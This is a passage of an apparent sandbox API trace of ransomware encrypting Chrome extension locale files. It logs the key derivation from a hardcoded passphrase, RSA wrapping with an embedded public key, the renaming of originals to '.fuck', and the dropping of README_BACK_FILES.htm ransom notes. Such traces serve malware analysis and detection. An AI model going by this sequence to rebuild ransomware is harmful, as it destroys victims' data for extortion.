phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.477] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.477] CryptHashData (hHash=0x2938978, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.478] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.478] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.478] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.478] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293fd40) returned 1 [0249.478] CryptImportPublicKeyInfo (in: hCryptProv=0x293fd40, dwCertEncodingType=0x1, pInfo=0x2932930*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932960*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932968*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937db8) returned 1 [0249.478] CryptEncrypt (in: hKey=0x2937db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.478] CryptEncrypt (in: hKey=0x2937db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f328*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f328*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.478] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293f328*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f328*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.479] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xdd, lpOverlapped=0x0) returned 1 [0249.480] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xdd, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.480] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.480] CloseHandle (hObject=0x5d58) returned 1 [0249.480] CloseHandle (hObject=0x5d5c) returned 1 [0249.481] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0249.484] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0249.484] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0249.486] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0249.487] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.487] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.487] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.487] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.487] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.487] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0249.487] AreFileApisANSI () returned 1 [0249.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.487] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.488] GetFileType (hFile=0x5d54) returned 0x1 [0249.488] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.489] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.489] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.490] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.490] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.490] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.490] GetLastError () returned 0x0 [0249.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json")) returned 0x20 [0249.490] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0249.491] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.491] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.492] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.493] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.498] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.498] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.498] CryptHashData (hHash=0x2938978, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.498] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.498] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.498] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.498] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293fdc8) returned 1 [0249.499] CryptImportPublicKeyInfo (in: hCryptProv=0x293fdc8, dwCertEncodingType=0x1, pInfo=0x29325f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932620*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932628*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937bf8) returned 1 [0249.499] CryptEncrypt (in: hKey=0x2937bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.499] CryptEncrypt (in: hKey=0x2937bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f218*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f218*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.499] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f218*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f218*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.500] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xda, lpOverlapped=0x0) returned 1 [0249.501] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xda, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.501] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.501] CloseHandle (hObject=0x5d5c) returned 1 [0249.501] CloseHandle (hObject=0x5d58) returned 1 [0249.502] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0249.505] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0249.505] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0249.507] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0249.508] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.508] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.508] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.508] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.508] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.508] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0249.509] AreFileApisANSI () returned 1 [0249.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.509] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.509] GetFileType (hFile=0x5d54) returned 0x1 [0249.509] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.510] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.511] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.511] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.511] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.511] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.511] GetLastError () returned 0x0 [0249.511] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json")) returned 0x20 [0249.511] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0249.512] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.512] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.513] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.513] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.515] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.515] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.515] CryptHashData (hHash=0x2938978, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.515] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.516] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.516] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.516] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293fe50) returned 1 [0249.516] CryptImportPublicKeyInfo (in: hCryptProv=0x293fe50, dwCertEncodingType=0x1, pInfo=0x2932a00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932a30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932a38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29380f8) returned 1 [0249.516] CryptEncrypt (in: hKey=0x29380f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.516] CryptEncrypt (in: hKey=0x29380f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293fed8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293fed8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.516] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293fed8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293fed8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.517] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf8, lpOverlapped=0x0) returned 1 [0249.519] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0249.519] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0249.519] CloseHandle (hObject=0x5d58) returned 1 [0249.519] CloseHandle (hObject=0x5d5c) returned 1 [0249.519] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 